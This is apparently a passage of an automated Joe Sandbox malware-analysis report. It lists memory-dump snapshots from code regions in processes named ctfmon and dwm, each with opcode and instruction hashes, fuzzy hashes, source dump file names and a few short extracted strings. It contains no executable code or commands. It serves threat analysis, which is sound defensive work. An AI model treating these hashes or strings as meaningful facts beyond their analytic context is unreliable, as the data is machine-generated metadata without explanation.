                                                              • Opcode ID: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction ID: 71756f43975670f075d0df9702dd65893daffc051f65922f9c9bda5bb278888f
                                                              • Opcode Fuzzy Hash: daee2fa1a6e6264072c4ac78d0d566bb33050aa9f935d31f1b122265433fbf64
                                                              • Instruction Fuzzy Hash: FEF06922A0E7C55FD31A073888754687F71AE6722530B01E7C095CF0F3D9299D8AC762
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction ID: 01faf4bb102ef15a40fe28a017c915bb05845bdf3bd224aa624573ac65a7f278
                                                              • Opcode Fuzzy Hash: 82a5860a0b7a321af4d36804a7609a158e09df83ae2663a99a4a2c573a75a3d2
                                                              • Instruction Fuzzy Hash: 2E011230A19B1E8EEB38EA54D8A47F532A1FF54702F1111BDD40ED31B2EA7C2B818A00
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction ID: 4b6a06b41acc23438f7dcebd3c21f45e4ab54e5599ee749a45f6da057d38525a
                                                              • Opcode Fuzzy Hash: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction Fuzzy Hash: E9F03630709B1D4AE674EB44E8B4AB53391AF54701F1212B9D90ED71F3EE7C6B454504
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22f0f614b482e578ef3f182d912a34d9961161de6b3de36afe9a193c8084e9fd
                                                              • Instruction ID: 870788c67c91c2a07ef1b711aaefe1768f338845f11040a7cce6d1a86680f5f3
                                                              • Opcode Fuzzy Hash: 22f0f614b482e578ef3f182d912a34d9961161de6b3de36afe9a193c8084e9fd
                                                              • Instruction Fuzzy Hash: 75F02131E15E5A4BE3155B1488B50AC33A2FF40311F5543B0DC1E4B3F6EF291E0286C1
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction ID: e84fcae9ad6c2e70ddba8a3231400df3fdd00eb8499688afd1799b603f63d25c
                                                              • Opcode Fuzzy Hash: 02ef73dc90ffce9414ea8ab63213b3e8cc379f0c2466559ca730fd2c5fbc9bec
                                                              • Instruction Fuzzy Hash: B2F0E530B587880FC7199A2958654617BF1DF5B20534A42FFD49ACB2A3DD28AC458741
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b790000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction ID: b9e38a45d214338207375f53aaff6657e60c872d555f0b4c04b9511e9fa82ff3
                                                              • Opcode Fuzzy Hash: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction Fuzzy Hash: ADF08935B0EB5F4BE635DA9898605BA7364EF05340B134379D41AD32F6DF38EA018680
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction ID: ed2c4dbbe90490d199d0fc8ea0ed0570fdc47263a940487e524eb35db3123ffd
                                                              • Opcode Fuzzy Hash: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction Fuzzy Hash: 6BE09230B1A7C44FCB0AAA3888684607BB1EF6720278952FFC445CB2E3D928DC89C741
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba1832d6a42cc2a2324e29a5eb271fdb7fb24af124e03169fdc2222386593029
                                                              • Instruction ID: 418bc479a2730b1b89f34b398ef291d3a93538327c482a4cecd08725bfa39a09
                                                              • Opcode Fuzzy Hash: ba1832d6a42cc2a2324e29a5eb271fdb7fb24af124e03169fdc2222386593029
                                                              • Instruction Fuzzy Hash: 82E04F30A197844FCB0A9B2888699503BB0EF6B21178A40EBC049CF1F3E629DC48C752
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction ID: 8ff9a74c172d593a99d19d8d17c87831a92da2d8bf39a88eb2c060635687cbe1
                                                              • Opcode Fuzzy Hash: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction Fuzzy Hash: 38E0D863F0DE0D0EF2A4D55804B43B825C1DF58762F0603BAD00EC22B2FD281D414241
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction ID: fdef9bf5e5cd33f083a5d342d4c5a74af720a8d6a8f45fec749f27a802b7c12e
                                                              • Opcode Fuzzy Hash: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction Fuzzy Hash: AAE08631A497804FC7095B2888A98543BB0DF6711278A40FBC005CF2B3D62DDC89C711
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b790000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction ID: b61c8b3a24e5e9fe93ea92e9a5c6236a7505e948a5b4c10c68850a5d05c6efb2
                                                              • Opcode Fuzzy Hash: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction Fuzzy Hash: 6DD05E30B60A0D4B8B4CA62D8458430B3D2E7AA2067D45278940BC6295ED25ECC68B80
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction ID: 4b7b4d292ed0ec8a4721965bc28670ff99bf46d5edff54a11296b8e382a75cb2
                                                              • Opcode Fuzzy Hash: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction Fuzzy Hash: D5E01230F0DA1E46FBA49144C8A07E97394EF94312F1601B8D58EA33E1DD38AFC48A45
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b790000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                              • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                              • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                              • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df427db11c4b8b1adbad613056556dcb95fb70cc3927cb4c4236a00b99d5bef6
                                                              • Instruction ID: 9092713a171e2d5dad25970d90dfa1a4dd6ca75999bd10eba25e6c1d4413d71b
                                                              • Opcode Fuzzy Hash: df427db11c4b8b1adbad613056556dcb95fb70cc3927cb4c4236a00b99d5bef6
                                                              • Instruction Fuzzy Hash: C8E0173150A7884FCB0BAB348CA99803FB0EE6B21178B01C7D045CF5B3EA598D89C762
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cc84ed8f1dfa8a68fc1917448678c270b1a1f028bc4073e877321ca715a2d44
                                                              • Instruction ID: d23d908daa4caa6190485d6fb195fe7573d829f4088949ca24af75020e520b84
                                                              • Opcode Fuzzy Hash: 8cc84ed8f1dfa8a68fc1917448678c270b1a1f028bc4073e877321ca715a2d44
                                                              • Instruction Fuzzy Hash: 9AE04F31A4F7C04FC74B973488788507FA1DE5721074A45EEC085CF5B3D6198D49C701
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc0893e6972b1db24272a6556afb45700994b964ecba2b9cc7463da4df9d0a74
                                                              • Instruction ID: bf4e0e619de8f275e65c4db50b820028ece5d949631a47f6ca0e263d6d0719b4
                                                              • Opcode Fuzzy Hash: dc0893e6972b1db24272a6556afb45700994b964ecba2b9cc7463da4df9d0a74
                                                              • Instruction Fuzzy Hash: 50E04F6194F7C04FC70B9B3588B88407F60EE2721178A45EEC085CF1B3E6198C49C701
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70e04e2a095345de69a44cc4f4a7a3ebee4407e6c86ec40a26d25b3b58c45cbd
                                                              • Instruction ID: 226f5cdc0ad8bc2c5e4dff0f02c3e0c1f604d46dfeb201affb1b12e14cf5709f
                                                              • Opcode Fuzzy Hash: 70e04e2a095345de69a44cc4f4a7a3ebee4407e6c86ec40a26d25b3b58c45cbd
                                                              • Instruction Fuzzy Hash: B7E0EC3150A7844FC70A9B2488A99943FB0EF2621178A01EBC449CF5B3D6299888CB52
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction ID: 70612281d9585890a6d6f4cf59acf35b8267b14e10d1c9ea082ef5e7cea4887d
                                                              • Opcode Fuzzy Hash: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction Fuzzy Hash: E9D01234B519044FC71CA63C886987473D1EB6A217B9541B9D00AD72B1D96ADD89CB41
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction ID: 7d5a485abe3f1a101fe236d7c12fdd607988a3ec4558fc01dadeabbbd6232ba3
                                                              • Opcode Fuzzy Hash: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction Fuzzy Hash: 6BD02230B649040FC70CAA3C88588307390EB6A20278100A8D00BD72B1E92ADD88CB40
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction ID: 2a1721bd37c2c0e229c6edeb69d2e9e63533fe1581581a77562d8443ec22fc0d
                                                              • Opcode Fuzzy Hash: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction Fuzzy Hash: E7C0123062990E8FDA40BB28C8C9824BBA0FB0E202BDA01E4E00CC71B1D629A8908700
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b13688833a01d731f3a2dedd5a3c717fe161ef50268dfdb8dc8fc84a6ebbec9
                                                              • Instruction ID: d747e547a66aebc92c587616af35a20cd085c957edf79648b75eb635ad53b46a
                                                              • Opcode Fuzzy Hash: 2b13688833a01d731f3a2dedd5a3c717fe161ef50268dfdb8dc8fc84a6ebbec9
                                                              • Instruction Fuzzy Hash: E5D02E30F0E7AA4AE364E6848871BA83280AF00300F0001B4E00C836E3C8083C408E82
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction ID: faff3e12c8c9fe63c49ea462aac9b206cb8c5b8a4464a0f790921376c9a1d048
                                                              • Opcode Fuzzy Hash: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction Fuzzy Hash: B7C04C05F5FF5F01E47531EE54E60ADB6409FC4A26FE31772D50D801B29C6E22D50196
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction ID: 693aefd0555aa7c13d0ffe86cffec59e3527bad17fa240652fc2ed9797b61d88
                                                              • Opcode Fuzzy Hash: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction Fuzzy Hash: 5CC08C30611C0C8FC908EB28C88480433A0FB09201BC200A0E00AC7170D229DCC0C740
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction ID: 55681b21aa852a478038f68aa83c82495a066b141e3c6cd6be9a93864b0cfab4
                                                              • Opcode Fuzzy Hash: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction Fuzzy Hash: 9DB01200D5BD4F00E42431FB08D30647440AF84105FD30270E40C802B2986E12940282
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9$#{9
                                                              • API String ID: 0-1692736845
                                                              • Opcode ID: be64be5333022bf308476621d778135d585de084caa77ddb1cf8954df1b0d530
                                                              • Instruction ID: a8db8b9a5516349690576d0cceb03b37db2f7a8324dbcda29aa8caba863ed978
                                                              • Opcode Fuzzy Hash: be64be5333022bf308476621d778135d585de084caa77ddb1cf8954df1b0d530
                                                              • Instruction Fuzzy Hash: EE51CE0BB8E52A49E31933FD75618FC6B458FA5335B0843B7F06E890DB8E18608186E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: 2c9197ac4c996fcfb2fb1f281e94eb23203a70c0e9d68cba8efd3423c99c04d4
                                                              • Instruction ID: deded077fee64675daecbf8f65ee964828ae6cef5a1f1917a923f0b5a66ba912
                                                              • Opcode Fuzzy Hash: 2c9197ac4c996fcfb2fb1f281e94eb23203a70c0e9d68cba8efd3423c99c04d4
                                                              • Instruction Fuzzy Hash: 5C81CE21F5E38A0BE33C49688CA207577D1EBD6205B1A837DD8DBC35B7DC28B9174281
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 82a884a73d0b61510eef020e734f9c6633b5f480d21cdba7e23f4f496c77ebfa
                                                              • Instruction ID: 22333048b608de6ac65dd08624c99a6cbbbf00a19350bea1a0b2bd83504e5abc
                                                              • Opcode Fuzzy Hash: 82a884a73d0b61510eef020e734f9c6633b5f480d21cdba7e23f4f496c77ebfa
                                                              • Instruction Fuzzy Hash: D1F0E530B5C7C80FC71A9A2D58654617BF1DF5B20534A42FFD49ACB2A3DD18EC458785
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b770000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e81ef5309e618f83601f0a60200bb5dd2761664f8ad8159a94b30b8358ca33c2
                                                              • Instruction ID: de7230c4226a910f9c76430b1e94d9b43514d36c5cadd9c17e6180817976a0af
                                                              • Opcode Fuzzy Hash: e81ef5309e618f83601f0a60200bb5dd2761664f8ad8159a94b30b8358ca33c2
                                                              • Instruction Fuzzy Hash: 8DF06230E1861E8BE750EFA8DCA55BD77B1FF40314F50037AD4199B2EADF6429418B81
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b770000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction ID: d84c2dc4f2c2d82d45b8845fcbda32946ae5a8debe4aee7fe3e45d6001626ae7
                                                              • Opcode Fuzzy Hash: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction Fuzzy Hash: 76F0B435B1E66E8EE6359A9888A05BE7364EF00300B024378D41AC31F6EE78EA4182C0
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction ID: fed1ab85ae184c5a851267a9bda0b80492264ca6f9164f8e354e1c71cb223adc
                                                              • Opcode Fuzzy Hash: f213c50215499450995a76fd97423c786ea4869def82481ed996932733a1a6a1
                                                              • Instruction Fuzzy Hash: 2EF09630B0970DCEE674EA44E874AB53391AF54300F1112BAD90EC32F3EE1C6F454501
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66919c614c019bd96aad4cec9afff1b5cfb4578852579dc13f6e9f296e09760c
                                                              • Instruction ID: d866e9248c7fdfbd88fd75bb08f9f6279a047ea9997d10c1dfcd3de525c10059
                                                              • Opcode Fuzzy Hash: 66919c614c019bd96aad4cec9afff1b5cfb4578852579dc13f6e9f296e09760c
                                                              • Instruction Fuzzy Hash: 28E09230B1A7854FC70AAA3888695607BB1EF6720278952FFC445CB1A3DA28DC89C741
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
